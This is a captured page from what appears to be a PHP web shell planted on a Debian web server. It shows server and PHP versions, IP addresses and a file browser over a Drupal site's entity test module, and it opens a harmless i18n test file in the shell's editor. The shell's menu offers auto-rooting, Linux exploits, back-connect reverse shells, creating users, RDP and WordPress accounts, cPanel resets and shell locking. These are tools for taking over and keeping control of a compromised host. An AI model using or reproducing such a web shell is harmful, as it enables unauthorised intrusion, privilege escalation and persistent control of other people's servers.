Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.141.201.176
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
entity /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
entity_feature.info
323
B
-rw-r--r--
entity_feature.module
675
B
-rw-r--r--
entity_test.info
362
B
-rw-r--r--
entity_test.install
4.7
KB
-rw-r--r--
entity_test.module
7.71
KB
-rw-r--r--
entity_test_i18n.info
360
B
-rw-r--r--
entity_test_i18n.module
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : entity_test_i18n.module
<?php /** * @file * Entity-test i18n integration module via entity API i18n support. * * @see EntityDefaultI18nController */ /** * Implements hook_entity_info_alter(). */ function entity_test_i18n_entity_info_alter(&$info) { // Enable i18n support via the entity API. $info['entity_test_type']['i18n controller class'] = 'EntityDefaultI18nStringController'; } /** * Implements hook_entity_property_info_alter(). */ function entity_test_i18n_entity_property_info_alter(&$info) { // Mark some properties as translatable, but also denote that translation // works with i18n_string. foreach (array('label') as $name) { $info['entity_test_type']['properties'][$name]['translatable'] = TRUE; $info['entity_test_type']['properties'][$name]['i18n string'] = TRUE; } } /** * Implements hook_{entity_test_type}_insert(). */ function entity_test_i18n_entity_test_type_insert($test_type) { i18n_string_object_update('entity_test_type', $test_type); } /** * Implements hook_{entity_test_type}_update(). */ function entity_test_i18n_entity_test_type_update($test_type) { // Account for name changes. if ($test_type->original->name != $test_type->name) { i18n_string_update_context("entity_test:entity_test_type:{$test_type->original->name}:*", "entity_test:entity_test_type:{$test_type->name}:*"); } i18n_string_object_update('entity_test_type', $test_type); } /** * Implements hook_{entity_test_type}_delete(). */ function entity_test_i18n_entity_test_type_delete($test_type) { i18n_string_object_remove('entity_test_type', $test_type); }
Close